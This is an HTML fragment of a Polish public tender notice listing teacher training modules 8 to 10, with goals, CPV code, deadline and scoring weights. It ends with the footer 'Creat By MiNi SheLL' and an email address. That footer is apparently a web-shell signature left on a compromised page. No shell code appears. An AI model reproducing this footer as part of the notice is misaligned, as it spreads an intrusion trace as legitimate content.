<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 80.40.00.00-8.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 30.11.2011.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>cena oraz dodatkowe kryteria i ich znaczenie:</p>
<ul class="kh_indent_1">
<li>1. Cena - 30</li>
<li>2. Przedstawiony scenariusz zajęć - 35</li>
<li>3. Spełnianie kryteriów dodatkowych - 35</li>
</ul>
</li>
</ul><br>
<p><b>CZĘŚĆ Nr:</b> 8 <b>NAZWA:</b> MODUŁ 8 
Metodyka pracy rewalidacyjno - wychowawczej z dziećmi i młodzieżą głęboko upośledzonymi umysłowo.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Cele szczegółowe
Uczestnik:
- potrafi przeprowadzić obserwację diagnozującą, diagnozę umiejętności funkcjonalnych oraz postawić wstępną diagnozę (na podstawie poznanej wcześniej diagnozy psychologiczno- klinicznej),
- potrafi opracować indywidualne programy rewalidacji i terapii oraz dokonywać analizy i oceny dynamiki rozwoju,
- potrafi organizować środowisko terapeutyczne i wychowawcze usprawniające osoby upośledzone umysłowo w stopniu głębokim,.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 80.40.00.00-8.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 30.11.2011.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>cena oraz dodatkowe kryteria i ich znaczenie:</p>
<ul class="kh_indent_1">
<li>1. Cena - 30</li>
<li>2. Przedstawiony scenariusz zajęć - 35</li>
<li>3. Spełnianie kryteriów dodatkowych - 35</li>
</ul>
</li>
</ul><br>
<p><b>CZĘŚĆ Nr:</b> 9 <b>NAZWA:</b> MODUŁ 9 
Metodyka wychowania w internacie (placówce opiekuńczo- wychowawczej).</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Cele szczegółowe
Uczestnik:
- potrafi planować pracę wychowawczo - terapeutyczną w internacie
- zna metody i techniki poznawania wychowanków
- potrafi trafnie stosować metody i techniki wychowawcze
- potrafi tworzyć sytuacje wychowawcze kształtujące zachowania i postawy prospołeczne wychowanków.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 80.40.00.00-8.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 30.11.2011.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>cena oraz dodatkowe kryteria i ich znaczenie:</p>
<ul class="kh_indent_1">
<li>1. Cena - 30</li>
<li>2. Przedstawiony scenariusz zajęć - 35</li>
<li>3. Spełnianie kryteriów dodatkowych - 35</li>
</ul>
</li>
</ul><br>
<p><b>CZĘŚĆ Nr:</b> 10 <b>NAZWA:</b> MODUŁ 10 
Praktyki pedagogiczne.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Cele szczegółowe
Uczestnik:
- zna organizację i funkcjonowanie placówki kształcenia specjalnego
- zna dokumentację nauczyciela-wychowawcy
- wie jak opracować scenariusz zajęć
- wie jak organizować współpracę z rodzicami.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 80.40.00.00-8.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 30.11.2011.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>cena oraz dodatkowe kryteria i ich znaczenie:</p>
<ul class="kh_indent_1">
<li>1. Cena - 30</li>
<li>2. Przedstawiony scenariusz zajęć - 35</li>
<li>3. Spełnianie kryteriów dodatkowych - 35</li>
</ul>
</li>
</ul><br>

Creat By MiNi SheLL
Email: jattceo@gmail.com